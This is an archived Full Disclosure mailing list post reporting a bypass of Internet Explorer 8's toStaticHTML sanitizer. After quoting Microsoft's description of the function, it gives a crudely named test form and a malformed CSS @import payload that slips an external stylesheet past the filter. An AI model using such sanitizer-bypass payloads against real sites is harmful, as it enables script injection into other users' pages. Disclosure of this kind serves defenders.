Full Disclosure mailing list archives
IE8 toStaticHtml Bypass
From: Web Sec <root () 80sec com>
Date: Sat, 14 Aug 2010 15:55:55 +0800
IE8 toStaticHtml Bypass Safer Mashups: HTML Sanitization IE8 exposes a new method on the window object named toStaticHTML. When a string of HTML is passed to this function, any potentially executable script constructs are removed before the string is returned. Internally, this function is based on the same technologies as the server-side Microsoft Anti-Cross Site Scripting Library mentioned previously. So, for example, you can use toStaticHTML to help ensure that HTML received from a postMessage call cannot execute script, but can take advantage of basic formatting: document.attachEvent('onmessage',function(e) { if (e.domain == 'weather.example.com') { spnWeather.innerHTML = window.toStaticHTML(e.data); } } Calling: window.toStaticHTML("This is some <b>HTML</b> with embedded script following... <script>alert('bang!');</script>!"); will return: This is some <b>HTML</b> with embedded script following... ! ---------------------------- That is some info about toStaticHtml function from http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-v-comprehensive-protection.aspx,80sec found there is someway to bypass this function,it may be XEESD :) You can test with somecode below: <script type="text/javascript"> function fuckie() { var szInput = document.shit.input.value; var szStaticHTML = toStaticHTML(szInput); ResultComment = szStaticHTML; document.shit.output.value = ResultComment; } </script> <form name="shit"> <textarea name='input' cols=40 rows=20> </textarea> <textarea name='output' cols=40 rows=20> </textarea> <input type=button value="fuck_me" name="fuck" onclick=fuckie();> </form> <style> }@import <%7D@import> url('//127.0.0.1/1.css');aaa {;} </style> <div id="x">Fuck Ie</div> http://www.wooyun.org/bug.php?action=view&id=189
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IE8 toStaticHtml Bypass Web Sec (Aug 16)